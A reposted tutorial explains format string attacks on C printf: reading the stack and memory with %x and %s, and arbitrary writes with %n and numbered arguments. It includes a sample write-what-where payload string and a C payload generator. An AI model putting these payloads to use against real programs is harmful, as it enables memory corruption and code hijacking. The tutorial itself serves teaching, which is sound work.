tutorial exploitation format string

Source: Internet  Posted by: 史蒂芬周 mac  Editor: 程序博客网  Date: 2024/06/08 19:50

Original article: http://www.infond.fr/2010/07/tutorial-exploitation-format-string.html

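This article is an introduction to format string attacks. The attack is made possible by incorrect use of the *printf functions in C.

What is a format string vulnerability?

The vulnerability arises whenever an attacker can inject a malicious format string into a *printf() call. Format specifiers are introduced by the % character.
Here is a correct use of printf(): the format is fixed and the string is passed as its argument: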
printf("%s", "hello");
Here is an incorrect use. Whoever controls argv[1] can inject a format string of their choice:
printf(argv[1]);
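
To make the difference concrete, here is a minimal sketch in C. The helper name print_untrusted is hypothetical, and it formats into a buffer with snprintf() only so that the result can be inspected. Because the untrusted text is passed as an argument to a fixed "%s" format, any % specifiers it contains are copied verbatim instead of being interpreted.

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical helper: copy untrusted text into out without ever
 * using it as the format string. Returns what snprintf() returns. */
int print_untrusted(char *out, size_t cap, const char *user_input) {
    assert(out != NULL && user_input != NULL);
    /* The format is a constant; user_input is only data. */
    return snprintf(out, cap, "%s", user_input);
}
```

Calling print_untrusted(buf, sizeof buf, "%x%x%n") leaves the literal text %x%x%n in buf; nothing is read from or written through the stack.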

For details on *printf, see:

http://man7.org/linux/man-pages/man3/sprintf.3.html

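%x prints a value in hexadecimal. It takes an unsigned integer as its argument (popped from the stack),
%s prints a string. It takes a pointer to a string as its argument (popped from the stack),
%n prints nothing. It takes an address as its argument (popped from the stack) and stores a signed integer at that address: the number of characters printed so far.
- %x lets us read the stack,
- %s lets us read anywhere in memory,
- %n lets us write anywhere in memory,
- %[number]$n ( %[number]$x ) lets us write anything anywhere, without popping. This is explained in detail below.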
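
The behaviour of %n is easiest to see in a legitimate call. The sketch below uses a made-up function name and assumes a C library in which %n is enabled for literal format strings (some hardened libraries reject it).

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical demo: returns the value that %n stores. */
int count_before_n(void) {
    char buf[32];
    int written = -1;
    /* %n stores the number of characters produced before it ("hello"). */
    int total = snprintf(buf, sizeof buf, "hello%n world", &written);
    assert(total > 0);
    return written;
}
```

Here the stored value is 5, the length of "hello". In an attack the same mechanism is used, except that the attacker chooses the address that receives the count.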

READ THE STACK:

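Before printf() is called, its arguments are pushed onto the stack. In the example below, 0x00000000 and then 0xffffffff are pushed, and printf() pops and prints them:
printf("%x%x", 0xffffffff, 0x00000000);
The problem appears when we "forget" to supply the arguments. printf() pops and prints whatever it finds anyway, so the call below prints the two words at the top of the stack (popping them as it goes):
printf("%x%x");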

READ IN MEMORY:

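The string passed to printf() is pushed onto the stack, last characters first, before the call. Each character is then copied in turn onto printf()'s own stack. For example: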
main(){ printf("hello"); }
+---------+
| o.... | <-- internal stack of printf():
+---------+ successively "hell" then "o\x00.."
| .... |
+---------+
| hell | <- stack of main()
+---------+
| o.... |
+---------+

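We can pop words with %x until we reach our string (pushed by main()).

But printf() offers a better tool: %[n]$s treats the n-th word on the stack as a string pointer and prints that string.

Tip: %[number]$s accesses the number-th argument without popping.

For example, the line below accesses the 8th word on the stack directly. Better still, nothing is popped:

printf("%8$s");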

This notation was designed for printing the same argument several times. For example, you might want to print the same text 8 times:

"oh la! la! la! la! la! la! la! la!"

You can write:

printf("oh %s %s %s %s %s %s %s %s", "la!","la!","la!","la!","la!","la!","la!","la!");

or:

printf("oh %1$s %1$s %1$s %1$s %1$s %1$s %1$s %1$s", "la!");

This notation is rarely used, but it is very handy for format string exploitation: it lets us read any word on the stack as many times as we like, without popping.
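
As a quick check of the numbered-argument notation, here is a shortened version of the example as a sketch. The function name is hypothetical, and the %1$s form is a POSIX extension rather than ISO C, so this assumes a POSIX-style C library.

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical demo: one argument, referenced three times by number. */
int repeat_la(char *out, size_t cap) {
    assert(out != NULL);
    /* Every %1$s refers to the same first argument. */
    return snprintf(out, cap, "oh %1$s %1$s %1$s", "la!");
}
```

With a large enough buffer the result is "oh la! la! la!", built from a single argument.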

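Now let's put an address at the start of our format string and use %[n]$s:

printf ( [address]%[n]$s )

main() puts the string on the stack: first s, then $, then [n], then %, and on top: [address].
main() then puts some other words on top of it. We will reach past them to get to our address.

printf() is then called. It reads the string from left to right and does the following:
- [address] : prints the bytes of [address],
- %[n]$s : prints the string pointed to by the address stored in the n-th stack position. We choose [n] so that this position holds [address].

We can therefore read the string located at [address].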

WRITE AN INTEGER IN MEMORY:

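Now let's see what happens if we replace %s with %n. An integer is written at the location given by [address]. This integer is the number of characters printf() has printed so far, so we have to print enough characters to reach the value we want.

Tip: %[n]$[k]x prints the n-th word in a field at least [k] characters wide

For example, with [k] == 20 and a word in the 7th stack position (0x64726f77 here, an illustrative value):

printf("%7$20x");

prints 12 spaces followed by the 8 hexadecimal digits, 20 characters in total:

            64726f77

Let's use this tip to write to memory.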
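
The link between the field width and the value stored by %n can be checked in a legitimate call. This is only a sketch: the function name is hypothetical, the arguments are passed explicitly instead of being found on the stack, and it assumes a POSIX-style C library that accepts numbered arguments and %n.

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical demo: pad a word to 20 characters, then store the count. */
int pad_then_count(char *out, size_t cap, unsigned word) {
    int count = -1;
    assert(out != NULL);
    /* %1$20x prints word in a 20-character field; %2$n stores the count. */
    snprintf(out, cap, "%1$20x%2$n", word, &count);
    return count;
}
```

For any 32-bit word the stored count is 20, because the hexadecimal digits never exceed the requested width. Changing the width changes the value that gets written.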

WRITE AN ADDRESS IN MEMORY

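Our string will be:

[address+3][address+2][address+1][address]%1$[n1-16]x%[m+4]$n%1$[n2-n1]x%[m+3]$n%1$[n3-n2]x%[m+2]$n%1$[n4-n3]x%[m+1]$n[padding]

For example:

"\x43\xff\xff\xbf\x42\xff\xff\xbf\x41\xff\xff\xbf\x40\xff\xff\xbf%1$85x%11$n%1$127x%10$n%1$156x%9$n%1$408x%8$nAAA"

Note: the %[number]$ notation does not pop anything.

[m] is the number of words on the stack before [address+3], so [address+3] is argument number [m+1] and [address] is argument number [m+4].
[n1], [n2], [n3] and [n4] are the decimal character counts whose low bytes are the values we want to write to each byte of memory, starting with the byte at [address].

How does printf() interpret this string, and what happens in memory?
Here is the answer:
[address+3][address+2][address+1][address] : prints 16 chars. Memory and stack are unchanged.
%1$[n1-16]x : prints [n1-16] chars (spaces followed by the first argument on the stack). n1 chars have been printed so far. The stack is unchanged.
%[m+4]$n : prints nothing. Writes the number of chars printed so far (n1) to the address in position [m+4] ([address]).
%1$[n2-n1]x : prints [n2-n1] chars. n2 chars have been printed so far.
%[m+3]$n : prints nothing. Writes the number of chars printed so far (n2) to the address in position [m+3] ([address+1]).
%1$[n3-n2]x : prints [n3-n2] chars. n3 chars have been printed so far.
%[m+2]$n : prints nothing. Writes the number of chars printed so far (n3) to the address in position [m+2] ([address+2]).
%1$[n4-n3]x : prints [n4-n3] chars. n4 chars have been printed so far.
%[m+1]$n : prints nothing. Writes the number of chars printed so far (n4) to the address in position [m+1] ([address+3]).

Each %n stores a whole 4-byte integer, so the writes go from the lowest address to the highest: the upper bytes left by one write are overwritten by the next one.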
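
The construction of such a string can be sketched as a small generator. Everything here is an assumption made for illustration: the function name build_payload, a 32-bit little-endian target, the address order [address+3]..[address] used above, and the choice to issue the write to [address] first (argument m+4) because %n stores a full 4-byte integer. Padding is left out. Each field width is kept at 8 or more so that %x prints exactly that many characters.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/* Append the 4 bytes of a 32-bit value in little-endian order. */
static size_t put_le32(unsigned char *out, uint32_t v) {
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(v >> (8 * i));
    return 4;
}

/*
 * Hypothetical helper: build the string into out and return its length,
 * or 0 if it does not fit.
 *   address: where the 32-bit value should land
 *   value:   the value to compose, one byte per %n
 *   m:       number of stack words before [address+3]
 */
size_t build_payload(unsigned char *out, size_t cap,
                     uint32_t address, uint32_t value, unsigned m) {
    assert(out != NULL);
    if (cap < 17)
        return 0;

    size_t len = 0;
    /* [address+3][address+2][address+1][address] */
    for (int k = 3; k >= 0; k--)
        len += put_le32(out + len, address + (uint32_t)k);

    unsigned count = 16; /* characters printed so far: the 4 addresses */
    for (unsigned k = 0; k < 4; k++) {
        unsigned target = (value >> (8 * k)) & 0xffu;
        /* Only the low byte matters, so add 0x100 until the count
         * can grow by at least 8 characters. */
        while (target < count + 8)
            target += 0x100;
        /* [address+k] is argument number m + 4 - k. */
        int n = snprintf((char *)out + len, cap - len, "%%1$%ux%%%u$n",
                         target - count, m + 4 - k);
        if (n < 0 || (size_t)n >= cap - len)
            return 0;
        len += (size_t)n;
        count = target;
    }
    return len;
}
```

With address 0xbfffff40, value 0x1880e465 and m = 7, the text after the 16 address bytes comes out as %1$85x%11$n%1$127x%10$n%1$156x%9$n%1$152x%8$n. The generator always picks the smallest usable count, so the last width differs from the hand-written example.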

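Tip: use padding to align the addresses on the stack

Finally, we add padding at the end of the string.
[padding] : 0, 1, 2 or 3 chars appended to the end of the string (the bottom of the stack) so that the addresses fall on word boundaries on the stack.

This is the stack we want: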

+-----------+
|           |
|  m words  |
|           |
+-----------+
| address+3 |
+-----------+
| address+2 |
+-----------+
| address+1 |
+-----------+
| address   |
+-----------+
| %...      |
+-----------+

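The %n specifier takes a word from the stack and uses it as an address. But in general our address is not aligned on a word boundary of the stack.

Take the address AAAA (\x41\x41\x41\x41). On the stack it may be split across two words. There are 4 possible cases: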

-41000000-00414141-
-41410000-00004141-
-41414100-00000041-
-41414141-     <-- we want that!
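With the right amount of padding we can align the address. We put the padding at the end of the string:

- the character counts seen by %n are unaffected, because the padding comes after every %n,

- the alignment of our four addresses is affected, because on the stack the padding sits below the addresses.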

Tip: make the length of every argument a multiple of 4
It is a good habit to make every argument a multiple of 4 bytes long (= 4 characters, = 1 word of the stack, = 32 bits).

For example:
%1$[n1-16]x -> 8 bytes -> %, 1, $ and x take 4 bytes, so [n1-16] = xxxx (4 bytes) (4+4 = 8)

%[m+1]$n -> 8 bytes -> %, $ and n take 3 bytes, so [m+1] = xxxxx (5 bytes) (3+5 = 8)
Tip: add leading zeros to decimal numbers so that each argument is a multiple of 4 bytes long
We can add zeros to the left of every integer in our string. For example [n1-16] = "0235" and [m+1] = "00099". "00099" is interpreted as 99, and it occupies 5 bytes on the stack.

why [address+3][address+2][address+1][address] ?

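Suppose:
- [source] is the address of our payload, i.e. the value we want to write. For example [source] = 0xaabbccdd,

- [address] is the address we want to write to. For example [address] = 0x8049654.

On a little-endian machine the four bytes end up in memory like this:
aa bb cc dd
         ^address
      ^address1
   ^address2
^address3

so a 32-bit read at each address gives:
[address]   = 0x8049654 -> aabbccdd
[address+1] = 0x8049655 -> ??aabbcc
[address+2] = 0x8049656 -> ????aabb
[address+3] = 0x8049657 -> ??????aa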

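Choosing [n1], [n2], [n3], [n4]:

If [source] = 0xaabbccdd, the bytes dd, cc, bb and aa must each equal the number of characters printf() has written when the corresponding %n is reached. That count only grows, and dd is written first, so we would need aa > bb > cc > dd.

Tip: add a multiple of 0x100 to each byte of the source address

Only the low byte of each count has to match, so adding 0x100, 0x200 and 0x300 keeps the counts increasing whatever the byte values are.

For example:
[n1] = 0xdd = 221
[n2] = 0x1cc = 460
[n3] = 0x2bb = 699
[n4] = 0x3aa = 938
As these values are written to memory one after another, at [address], [address+1], [address+2] and [address+3], the word at [address] becomes:

     0x000000dd
     0x0001ccdd
     0x02bbccdd (the 1 of 1cc is overwritten)
0x03 0xaabbccdd (the 2 of 2bb is overwritten, and the 3 of 3aa spills into the next word)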
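
The overlapping writes can be replayed on an ordinary byte array, with no format string involved. This is a simulation sketch only: the function names are made up, and it assumes that each %n stores a 4-byte little-endian integer, as on 32-bit x86.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Store v at mem[off..off+3] in little-endian order, the way a
 * 4-byte %n write would on 32-bit x86. */
void store_le32(uint8_t *mem, size_t off, uint32_t v) {
    for (int i = 0; i < 4; i++)
        mem[off + i] = (uint8_t)(v >> (8 * i));
}

/* Read the 4-byte little-endian word at mem[off..off+3]. */
uint32_t load_le32(const uint8_t *mem, size_t off) {
    uint32_t v = 0;
    for (int i = 0; i < 4; i++)
        v |= (uint32_t)mem[off + i] << (8 * i);
    return v;
}

/* Clear an 8-byte scratch area, then apply the four writes at
 * offsets 0, 1, 2 and 3 (address, address+1, address+2, address+3). */
void four_writes(uint8_t mem[8], const uint32_t n[4]) {
    assert(mem != NULL && n != NULL);
    memset(mem, 0, 8);
    for (size_t k = 0; k < 4; k++)
        store_le32(mem, k, n[k]);
}
```

With n = {0xdd, 0x1cc, 0x2bb, 0x3aa}, load_le32(mem, 0) gives 0xaabbccdd and mem[4] holds the stray 0x03, matching the steps listed above.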

CONCLUSION

You have seen that format strings allow bad guys to read the stack, read or write anywhere in memory.